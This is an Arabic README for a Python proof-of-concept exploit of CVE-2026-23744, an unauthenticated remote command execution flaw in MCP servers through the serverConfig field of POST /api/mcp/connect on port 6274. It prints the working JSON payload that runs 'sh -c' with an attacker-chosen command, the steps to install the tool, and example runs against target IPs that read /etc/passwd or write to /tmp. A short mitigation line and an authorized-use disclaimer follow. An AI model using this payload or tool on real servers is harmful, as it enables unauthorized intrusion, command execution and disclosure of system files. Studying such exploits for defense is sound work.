
# Python PoC لـ CVE-2026-23744، تنفيذ أوامر عن بُعد غير مصادق عليه في خوادم MCP عبر حقل الأمر serverConfig في /api/mcp/connect (المنفذ الافتراضي 6274)
إثبات المفهوم (PoC) من إعداد d3vn0mi
CVE-2026-23744 هو ثغرة تنفيذ أوامر عن بُعد (RCE) غير مصادق عليها في الخوادم المتوافقة مع MCP والمعرّضة على المنفذ 6274. يقبل نقطة النهاية /api/mcp/connect كائن serverConfig يسمح للمتصلين بتحديد أمر نظام تشغيل ووسائطه بشكل تعسفي — دون أي فحوصات مصادقة أو تفويض.
يمكن للمهاجم الذي لديه وصول شبكي إلى الخدمة تنفيذ أوامر تعسفية بصلاحيات المستخدم الذي يشغّل خادم MCP.
| التفاصيل | القيمة |
|---|
| معرف CVE | CVE-2026-23744 |
| النوع | تنفيذ أوامر عن بُعد غير مصادق عليه |
| نقطة النهاية | POST /api/mcp/connect |
| المنفذ | 6274 (الافتراضي) |
| الخطورة | حرجة |
{
"serverConfig": {
"command": "sh",
"args": ["-c", "<ATTACKER_COMMAND>"],
"env": {}
},
"serverId": "anything"
}
يقوم الخادم بتشغيل command المقدَّم مع args المعطاة دون أي تنقية أو ضوابط وصول.
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt
# الاستخدام الأساسي
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'
# منفذ مخصص
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'
# تخطي فحص إمكانية الوصول
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check
# معرف خادم مخصص
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server
| العلم | الوصف |
|---|---|
-t, --target | عنوان IP أو اسم المضيف المستهدف (مطلوب) |
-c, --command | أمر نظام التشغيل للتنفيذ (مطلوب) |
-p, --port | منفذ الهدف (الافتراضي: 6274) |
-s, --server-id | قيمة serverId في الحمولة |
--timeout | مهلة الفحص بالثواني (الافتراضي: 30) |
--no-check | تخطي فحص إمكانية الوصول الأولي |
/api/mcp/connect عبر المصادقة وضوابط مستوى الشبكة.هذه الأداة مقدَّمة لأغراض الاختبار الأمني المصرّح به والتعليم فقط. الوصول غير المصرّح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام. احصل دائمًا على التفويض المناسب قبل الاختبار.
هذا المشروع مرخّص بموجب رخصة MIT.
d3vn0mi — github.com/d3vn0mi